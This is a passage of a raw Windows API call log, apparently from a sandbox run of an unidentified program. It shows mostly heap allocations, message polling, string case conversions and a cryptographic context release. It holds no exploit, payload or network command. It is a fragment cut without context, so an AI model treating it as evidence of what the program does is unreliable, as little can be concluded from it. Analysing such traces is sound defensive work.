hHeap=0x2af0000) returned 1 [0087.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0087.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0087.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0087.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0087.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0087.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0087.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0087.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0087.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0087.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0087.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0087.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0087.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0087.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0087.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0087.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0087.219] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0087.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0087.220] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0087.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0087.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0087.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9670 [0087.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0087.220] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0087.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0087.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0087.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0087.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0087.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0087.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0087.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0087.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0087.220] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0087.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0087.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0087.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0087.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0087.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0087.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0087.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0087.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0087.220] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0087.220] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0087.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0087.220] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0087.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0087.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0087.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9790 [0087.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0087.221] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0087.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0087.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0087.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0087.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0087.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0087.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0087.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0087.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0087.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0087.221] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0087.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0087.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0087.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0087.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0087.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0087.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0087.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0087.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0087.221] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0087.221] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0087.221] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0087.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0087.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0087.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0087.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0087.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0087.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0087.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0087.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0087.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0087.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0087.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0087.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0087.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7080 [0087.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0087.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0087.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0087.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0087.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0087.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0087.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0087.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0087.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0087.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0087.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0087.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0087.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa96b8 [0087.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0087.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa97c0 [0087.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9808 [0087.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9820 [0087.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0087.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0087.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9688 [0087.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0087.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9bb0 [0087.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9ac0 [0087.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b38 [0087.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73fb0 [0087.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0087.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9ad8 [0087.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9af0 [0087.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9be0 [0087.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0087.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a00 [0087.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b50 [0087.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0087.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0087.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0087.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0087.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0087.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0087.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0087.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0087.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0087.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0087.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0087.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0087.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0087.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0087.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0087.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0087.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0087.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0087.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0087.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0087.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0087.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0087.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0087.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0087.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0087.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0087.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0087.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0087.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0087.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0087.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0087.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0087.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0087.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0087.224] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0087.224] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0087.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0087.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0087.224] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0087.224] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0087.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0087.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0087.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0087.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0087.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0087.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0087.225] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0087.225] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0087.225] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0087.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0087.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0087.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0087.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0087.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0087.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0087.225] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0087.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0087.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0087.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0087.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0087.225] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0087.225] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0087.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0087.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0087.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0087.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0087.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0087.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0087.225] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0087.225] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0087.225] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0087.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0087.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0087.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0087.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0087.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0087.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0087.226] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0087.226] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0087.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0087.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0087.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0087.226] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0087.226] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0087.226] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0087.226] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0087.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7000, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0087.226] CryptReleaseContext (hProv=0x9961a8, dwFlags=0x0) returned 1 [0087.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0087.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0087.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0087.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0087.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0087.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0087.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0087.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0087.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0087.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0087.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 